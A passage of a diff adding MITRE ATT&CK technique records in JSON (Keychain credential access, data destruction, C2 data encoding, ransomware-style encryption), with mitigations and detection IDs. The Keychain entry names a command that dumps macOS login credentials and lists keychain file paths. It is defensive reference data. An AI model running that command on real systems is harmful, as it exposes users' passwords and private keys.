+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ryan Benson, Exabeam",
+                        "Barry Shteiman, Exabeam",
+                        "Sylvain Gil, Exabeam",
+                        "RedHuntLabs, @redhuntlabs",
+                        "Don Le, Stifel Financial"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2025-10-24 17:48:49.577000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1021: Restrict Web-Based Content",
+                            "M1027: Password Policies",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0037: Detect Suspicious Access to Browser Credential Stores"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-12 18:55:24.728000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Keychain",
+                    "description": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple\u2019s iCloud service. \n\nKeychains can be viewed and edited through the Keychain Access application or using the command-line utility <code>security</code>. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)\n\nAdversaries may gather user credentials from Keychain storage/memory. For example, the command <code>security dump-keychain \u2013d</code> will dump all Login Keychain credentials from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly read Login Keychain credentials from the <code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, where the default password for the Login Keychain is the current user\u2019s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1555/001",
+                            "external_id": "T1555.001"
+                        },
+                        {
+                            "source_name": "External to DA, the OS X Way",
+                            "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved September 12, 2024.",
+                            "url": "https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418"
+                        },
+                        {
+                            "source_name": "Keychain Services Apple",
+                            "description": "Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.",
+                            "url": "https://developer.apple.com/documentation/security/keychain_services"
+                        },
+                        {
+                            "source_name": "Empire Keychain Decrypt",
+                            "description": "Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.",
+                            "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py"
+                        },
+                        {
+                            "source_name": "OSX Keychain Schaumann",
+                            "description": "Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.",
+                            "url": "https://www.netmeister.org/blog/keychain-passwords.html"
+                        },
+                        {
+                            "source_name": "Keychain Decryption Passware",
+                            "description": "Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.",
+                            "url": "https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:29.756000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1027: Password Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0396: Detect Access to macOS Keychain for Credential Theft"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-03-14 18:47:17.701000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Data Destruction",
+                    "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider) Similarly, they may delete virtual machines from on-prem virtualized environments.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1485",
+                            "external_id": "T1485"
+                        },
+                        {
+                            "source_name": "DOJ  - Cisco Insider",
+                            "description": "DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging Cisco\u2019s Network. Retrieved December 15, 2020.",
+                            "url": "https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network"
+                        },
+                        {
+                            "source_name": "Unit 42 Shamoon3 2018",
+                            "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/"
+                        },
+                        {
+                            "source_name": "Palo Alto Shamoon Nov 2016",
+                            "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+                        },
+                        {
+                            "source_name": "FireEye Shamoon Nov 2016",
+                            "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+                        },
+                        {
+                            "source_name": "Kaspersky StoneDrill 2017",
+                            "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.",
+                            "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf"
+                        },
+                        {
+                            "source_name": "Talos Olympic Destroyer 2018",
+                            "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.",
+                            "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+                        },
+                        {
+                            "source_name": "Data Destruction - Threat Post",
+                            "description": "Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code Spaces Out of Business. Retrieved December 15, 2020.",
+                            "url": "https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/"
+                        },
+                        {
+                            "source_name": "Symantec Shamoon 2012",
+                            "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.",
+                            "url": "https://www.symantec.com/connect/blogs/shamoon-attacks"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Brent Murphy, Elastic",
+                        "David French, Elastic",
+                        "Syed Ummar Farooqh, McAfee",
+                        "Prasad Somasamudram, McAfee",
+                        "Sekhar Sarukkai, McAfee",
+                        "Varonis Threat Labs",
+                        "Joey Lei"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:27.149000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1032: Multi-factor Authentication",
+                            "M1053: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0146: Detection of Data Destruction Across Platforms via Mass Overwrite and Deletion Patterns"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:43.540000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Data Encoding",
+                    "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1132",
+                            "external_id": "T1132"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Wikipedia Binary-to-text Encoding",
+                            "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding"
+                        },
+                        {
+                            "source_name": "Wikipedia Character Encoding",
+                            "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Character_encoding"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Itzik Kotler, SafeBreach"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:23.915000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0108: Detection Strategy for Data Encoding in C2 Channels"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 23:39:50.117000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Non-Standard Encoding",
+                    "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1132/002",
+                            "external_id": "T1132.002"
+                        },
+                        {
+                            "source_name": "Wikipedia Binary-to-text Encoding",
+                            "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding"
+                        },
+                        {
+                            "source_name": "Wikipedia Character Encoding",
+                            "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Character_encoding"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-21 18:10:25.277000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0326: Behavior-chain detection for T1132.002 Data Encoding: Non-Standard Encoding across Windows, Linux, macOS, ESXi"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 23:36:52.095000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Standard Encoding",
+                    "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1132/001",
+                            "external_id": "T1132.001"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Wikipedia Binary-to-text Encoding",
+                            "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding"
+                        },
+                        {
+                            "source_name": "Wikipedia Character Encoding",
+                            "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Character_encoding"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:20.938000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0124: Behavior-chain detection for T1132.001 Data Encoding: Standard Encoding (Base64/Hex/MIME) across Windows, Linux, macOS, ESXi"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-03-15 13:59:30.390000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Data Encrypted for Impact",
+                    "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) Adversaries may also encrypt virtual machines hosted on ESXi or other hypervisors.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021) \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers or ESXi server login messages, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").(Citation: NHS Digital Egregor Nov 2020)(Citation: Varonis)\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) For example, in AWS environments, adversaries may leverage services such as AWS\u2019s Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data.(Citation: Halcyon AWS Ransomware 2025)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1486",
+                            "external_id": "T1486"
+                        },
+                        {
+                            "source_name": "CarbonBlack Conti July 2020",
+                            "description": "Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.",
+                            "url": "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/"
+                        },
+                        {
+                            "source_name": "FireEye WannaCry 2017",
+                            "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"
+                        },
+                        {
+                            "source_name": "Rhino S3 Ransomware Part 1",
+                            "description": "Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.",
+                            "url": "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/"
+                        },
+                        {
+                            "source_name": "Halcyon AWS Ransomware 2025",
+                            "description": "Halcyon RISE Team. (2025, January 13). Abusing AWS Native Services: Ransomware Encrypting S3 Buckets with SSE-C. Retrieved March 18, 2025.",
+                            "url": "https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c"
+                        },
+                        {
+                            "source_name": "Varonis",
+                            "description": "Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.",
+                            "url": "https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire"
+                        },
+                        {
+                            "source_name": "Crowdstrike Hypervisor Jackpotting Pt 2 2021",
+                            "description": "Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
+                        },
+                        {
+                            "source_name": "NHS Digital Egregor Nov 2020",
+                            "description": "NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.",
+                            "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary"
+                        },
+                        {
+                            "source_name": "US-CERT Ransomware 2016",
+                            "description": "US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA16-091A"
+                        },
+                        {
+                            "source_name": "US-CERT NotPetya 2017",
+                            "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A"
+                        },
+                        {
+                            "source_name": "US-CERT SamSam 2018",
+                            "description": "US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/AA18-337A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Oleg Kolesnikov, Securonix",
+                        "Mayuresh Dani, Qualys",
+                        "Harshal Tupsamudre, Qualys",
+                        "Travis Smith, Qualys",
+                        "ExtraHop"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2025-10-24 17:49:16.589000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1053: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0215: Detection of Multi-Platform File Encryption for Impact"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-02 14:19:22.609000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Data Manipulation",
